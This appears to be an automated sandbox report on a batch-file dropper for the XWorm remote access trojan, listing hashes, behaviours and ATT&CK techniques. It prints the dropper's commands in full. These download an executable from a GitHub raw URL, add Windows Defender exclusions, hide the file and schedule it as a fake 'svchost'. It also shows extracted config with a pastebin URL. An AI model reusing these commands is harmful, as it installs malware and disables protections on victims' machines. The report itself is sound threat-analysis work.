Analysis
-
max time kernel
96s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
02/03/2025, 21:21
Static task
static1
Behavioral task
behavioral1
Sample
Main.bat
Resource
win10v2004-20250217-en
Behavioral task
behavioral2
Sample
Main.bat
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral3
Sample
Main.bat
Resource
win11-20250217-en
General
-
Target
Main.bat
-
Size
458B
-
MD5
7fe7990fe96629419bef8f2b22415163
-
SHA1
a147bd40dd7a0465bbce96282af8d3cb1a11b57d
-
SHA256
ac74bb9370b5d6eff52190fe5767a21e6c3083e370b66506cc249a30d074f768
-
SHA512
5d8d925e133e7cc33cdb154cc596c40be7e1d8e9438e640f6e3128ba50b1ad1af5ebde614edfa54d45de436168949e08b1deec0b983b7314dc407f595b709754
Malware Config
Extracted
xworm
5.0
sSk9v0A6er9oWjcu
-
Install_directory
%AppData%
-
install_file
svchost.exe
-
pastebin_url
https://pastebin.com/raw/6EU9ps8S
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000023ba1-33.dat family_xworm behavioral1/memory/2260-35-0x0000000000730000-0x0000000000758000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 12 1184 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 952 powershell.exe 792 powershell.exe 2276 powershell.exe 4780 powershell.exe 3992 powershell.exe 1184 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 12 1184 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation main.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk main.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk main.exe -
Executes dropped EXE 3 IoCs
pid Process 2260 main.exe 2668 svchost.exe 4832 svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 10 raw.githubusercontent.com 12 raw.githubusercontent.com 28 pastebin.com 29 pastebin.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1184 powershell.exe 1184 powershell.exe 952 powershell.exe 952 powershell.exe 792 powershell.exe 792 powershell.exe 2276 powershell.exe 2276 powershell.exe 2276 powershell.exe 4780 powershell.exe 4780 powershell.exe 3992 powershell.exe 3992 powershell.exe 2260 main.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 2260 main.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2260 main.exe Token: SeDebugPrivilege 2668 svchost.exe Token: SeDebugPrivilege 4832 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2260 main.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 244 wrote to memory of 1184 244 cmd.exe 87 PID 244 wrote to memory of 1184 244 cmd.exe 87 PID 244 wrote to memory of 952 244 cmd.exe 91 PID 244 wrote to memory of 952 244 cmd.exe 91 PID 244 wrote to memory of 1344 244 cmd.exe 94 PID 244 wrote to memory of 1344 244 cmd.exe 94 PID 244 wrote to memory of 2260 244 cmd.exe 95 PID 244 wrote to memory of 2260 244 cmd.exe 95 PID 2260 wrote to memory of 792 2260 main.exe 98 PID 2260 wrote to memory of 792 2260 main.exe 98 PID 2260 wrote to memory of 2276 2260 main.exe 101 PID 2260 wrote to memory of 2276 2260 main.exe 101 PID 2260 wrote to memory of 4780 2260 main.exe 103 PID 2260 wrote to memory of 4780 2260 main.exe 103 PID 2260 wrote to memory of 3992 2260 main.exe 105 PID 2260 wrote to memory of 3992 2260 main.exe 105 PID 2260 wrote to memory of 4584 2260 main.exe 108 PID 2260 wrote to memory of 4584 2260 main.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1344 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Main.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/udx177/Main/refs/heads/main/main.exe -OutFile C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\main.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Views/modifies file attributes
PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\main.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'main.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4584
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4832
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
944B
MD56fc4344466f226c5c34911902c2da322
SHA1a978b32a1b8be065212a8d4783971ba5a03d8592
SHA25686df6ada7287842923c94383bf75741a9899208b18ac2e39093163ae5f614b5e
SHA512bf2e4e6f3f5e48960f9cca9f397c20e86ab7f407322b6bbdb24204bc0bbd722a6a58385daa7d2972f8cbc1cf13aaee49dec206359a5292050bb4a468d60946ee
-
Filesize
944B
MD583685d101174171875b4a603a6c2a35c
SHA137be24f7c4525e17fa18dbd004186be3a9209017
SHA2560c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5
-
Filesize
944B
MD56d14ccefeb263594e60b1765e131f7a3
SHA14a9ebdc0dff58645406c40b7b140e1b174756721
SHA25657cd435c8b2bf10a2c77698301789c032e1b6b623ff1420c72e8bca0b10f1e5c
SHA5122013a26123f72a4106524fd9d7389ac4654f97033d22707efc084fb2a3ad01c298eb64f01bb64861ab603615022dbe7cfc97475346edb16b3ba72e905127f101
-
Filesize
944B
MD597bcb22985b317b8bbb8f06a11a1a52f
SHA1035cd9359af2c88489516458c39f42f26665ae81
SHA256f3bc2dd9498ea38cb9b79eab3d8b97f9f71e3662140a965f9c9610fba290715a
SHA5121dc1d38e1615586965f0b8adcad0b692d952b46f3b5fd7f13598214ffbab36abcc5b9ecd9ff9164865c07acee5ee592fce48892069f5288ce19d77f97e4ff118
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD557b5cb85b2b1f1a47106577864c6d0ac
SHA18b2c814f07c643a0e84b918c9f927fcd796409dd
SHA2560bb30d453bca585126df4a0bd3aaa1ef8b8f7bbf6cf894f2caa6b23f2d5697b7
SHA512f12e9763e51ae95b4a184c989953693f2bb9c3959d9d69d1164b782c54253b0df4a063b767eb818f1b32f39dfe2ef052cb0ee3d5881345fe30f320d0f857f0be